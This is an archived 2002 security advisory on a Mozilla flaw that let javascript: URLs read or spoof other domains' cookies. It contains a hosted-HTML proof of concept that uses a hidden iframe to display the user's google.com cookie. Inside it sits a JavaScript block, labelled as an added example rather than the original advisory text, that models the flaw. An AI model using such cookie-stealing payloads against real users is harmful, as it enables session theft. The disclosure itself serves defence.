Mozilla cookie stealing - Sandblad advisory #9

From: Andreas Sandblad (sandbladat_private)
Date: Wed Jul 24 2002 - 07:45:59 PDT


                      - Sandblad advisory #9 -
    
    ---..---..---..---..---..---..---..---..---..---..---..---..----
    Title:      Steal/spoof arbitrary cookie in Mozilla
    Date:       [2002-07-24]
    Software:   Mozilla
    Vendor:     http://www.mozilla.org
    Fix:        The author has been working with Mozilla
                to produce a patch. Problem is fixed in
                Mozilla 1.1 Beta released 02-07-22.
    Workaround: Preferences->Advanced->Scripts & Plugins->
                Disable access to cookies using javascript
    Impact:     Steal/spoof arbitrary cookie           _     _
                using javascript: URLs               o' \,=./ `o
    Author:     Andreas Sandblad, sandbladat_private   (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    
    
    BACKGROUND:
    ===========
    
    I originally thought this was an XSS (cross-site scripting) issue, but soon
    came to the conclusion that it is limited to a design error in restricting
    access to cookies. Even though Mozilla is open source, I have not studied
    the source code in order to find and exploit the vulnerability.
    
    In the beginning I had problems avoiding javascript errors when using the
    javascript URL. My first solution was to make the host and path a valid
    javascript expression. google.com is a valid expression if google is an
    object and com is a property of the google object. Further, if google.com
    is a number, it is legal to use google.com/1. Parsing of host and path
    stops when a space is found.
    
    Well, I soon found a much easier solution: simply put a // in front of the
    host and path and a \n before the cookie-reading code. The reason I didn't
    find this directly is that the newline must be created in a javascript
    function; it can't be written literally in a javascript URL.
    
    
    DESCRIPTION:
    ============
    
    Mozilla allows script in the javascript: protocol to set and read cookies.
    For javascript URLs the host and path used for cookie access are pulled
    out as:
    "javascript:[host][path]"
    
    Cookie security is based only on restricting access to the matching host
    and path. By carefully crafting a malicious javascript URL and opening it
    in a new frame/iframe/window, it is possible to read and alter cookies of
    other domains.
    
    
    DETAILS:
    ========
    
    The easiest way to exploit the vulnerability is to create a javascript URL
    inside a javascript function as:
    javascript://[host]/[path]\n[code to read cookie]
    The // turns the host and path into a javascript comment, so they don't
    generate any javascript errors, and the newline ends the comment so the
    code after it runs.
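    The following is an added example, not code from the advisory or from
    Mozilla. It models the cookie-scoping rule the advisory describes (host
    and path pulled out of the text after "javascript:", with parsing stopping
    at whitespace) and shows why the "//host/path\n<code>" trick satisfies
    that rule while still being runnable script, compared with the earlier
    "host as a valid expression" approach from the BACKGROUND section. The
    parsing functions, the origin string and the host names are assumptions
    made for illustration; the real Mozilla code was not consulted.

```javascript
// Added example (not from the advisory or Mozilla): a model of the flawed
// cookie scoping for javascript: URLs and of the payload that abuses it.

const SCHEME = "javascript:";

function scriptOf(url) {
  return url.slice(SCHEME.length);
}

// Flawed rule, as the advisory describes it: treat "[host][path]" after the
// scheme like an http URL and use it to decide which cookies the script may
// see. Parsing stops at the first whitespace (simplification: \n counts too).
function flawedCookieScope(url) {
  if (!url.startsWith(SCHEME)) return null;
  const token = scriptOf(url).split(/\s/)[0];
  const m = /^(?:\/\/)?([^\/\s]+)(\/\S*)?$/.exec(token);
  if (!m) return { host: "", path: "" };
  return { host: m[1], path: m[2] || "/" };
}

// Correct rule: a javascript: URL has no authority of its own. The script
// runs with the origin of the document that navigated the frame, and cookie
// access must be scoped to that origin, never to text inside the URL.
function correctCookieScope(url, navigatingOrigin) {
  if (!url.startsWith(SCHEME)) return null;
  return navigatingOrigin;
}

// Build the advisory's payload: "//host/" is a javascript line comment, the
// newline ends the comment, and the expression after it is what executes.
function buildPayload(host, code) {
  return SCHEME + "//" + host + "/\n" + code;
}

// Does the script part parse? new Function checks syntax without running it.
function scriptParses(url) {
  try { new Function(scriptOf(url)); return true; } catch (e) { return false; }
}

// Does the script part run without throwing? Only used here with harmless
// string expressions. In a browser, the value a javascript: URL evaluates to
// becomes the frame's document, which is why the payload is an HTML string.
function scriptRuns(url) {
  try { new Function(scriptOf(url))(); return true; } catch (e) { return false; }
}

// Constructed inputs: the two approaches mentioned in the advisory.
const code = "'<body onload=alert(document.cookie)>'";
const commentTrick = buildPayload("www.google.com", code);
// Syntactically valid (a division), but "www" is not defined at run time.
const expressionTrick = SCHEME + "www.google.com/\n" + code;

console.log("flawed scope, comment trick:", flawedCookieScope(commentTrick));   // { host: "www.google.com", path: "/" }
console.log("flawed scope, expr trick:  ", flawedCookieScope(expressionTrick)); // { host: "www.google.com", path: "/" }
console.log("expr trick parses:", scriptParses(expressionTrick));   // true
console.log("expr trick runs:  ", scriptRuns(expressionTrick));     // false (ReferenceError)
console.log("comment trick runs:", scriptRuns(commentTrick));       // true
// Correct scoping ignores the URL text entirely (origin is an assumed value).
console.log("correct scope:", correctCookieScope(commentTrick, "http://attacker.example")); // "http://attacker.example"
```

    Both URLs satisfy the flawed host/path check, but only the comment trick
    also executes cleanly, which is the practical difference the advisory
    found. The hardened rule has no parser at all: the cookie jar a
    javascript: URL may touch is decided by who navigated the frame, not by
    what the URL says.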
    
    
    EXPLOIT:
    ========
    
    Instructions:
    Put the exploit in a html document on a remote server and load it with
    your Mozilla browser to activate the exploit.
    
    -------------------------- CUT HERE ----------------------------
    <pre>
    Title:      Mozilla cookie stealing/spoofing
    Date:       [2002-07-24]
    Impact:     Steal/spoof arbitrary cookie           _     _
                using javascript: URLs               o' \,=./ `o
    Author:     Andreas Sandblad, sandbladat_private   (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    This demo will display your google cookie (must exist).
    </pre>
    
    <body onload=init()>
    <!-- hidden frame that is navigated to the javascript: URL -->
    <iframe name=f height=0 width=0 style=visibility:hidden></iframe>
    <script>
    function init(){
      // "//www.google.com/" is read as host and path for cookie scoping but
      // is only a comment to the javascript engine; the newline ends the
      // comment and the string after it becomes the frame's document.
      f.location = "javascript://www.google.com/\n"+
        "'<body onload=alert(document.cookie)>'";
    }
    </script>
    -------------------------- CUT HERE ----------------------------
    
    
    Disclaimer:
    ===========
    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.
    
    
    Old advisories:
    ===============
    #8 [2002-07-23] "Pressing CTRL in IE is dangerous"
    http://online.securityfocus.com/archive/1/283866
    #7 [2002-05-19] "IE dot bug"
    http://online.securityfocus.com/archive/1/273168
    #6 [2002-05-15] "Opera javascript protocoll vulnerability"
    http://online.securityfocus.com/archive/1/272583
    #5 [2002-04-26] "Mp3 file can execute code in Winamp."
    http://online.securityfocus.com/archive/1/269724
    #4 [2002-04-15] "Using the backbutton in IE is dangerous."
    http://online.securityfocus.com/archive/1/267561
    
    
    Greetings:
    ==========
    For feedback concerning this issue:
    Ingesson, Quitta, Hawkan.
    For feedback on the last advisory that I forgot to acknowledge:
    Tys0n-
    
    
    Feedback:
    =========
    Please send suggestions and comments to:           _     _
    sandbladat_private                              o' \,=./ `o
                                                        (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    Andreas Sandblad,
    student in Engineering Physics at Umea University, Sweden.
    -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
    



    This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 08:10:20 PDT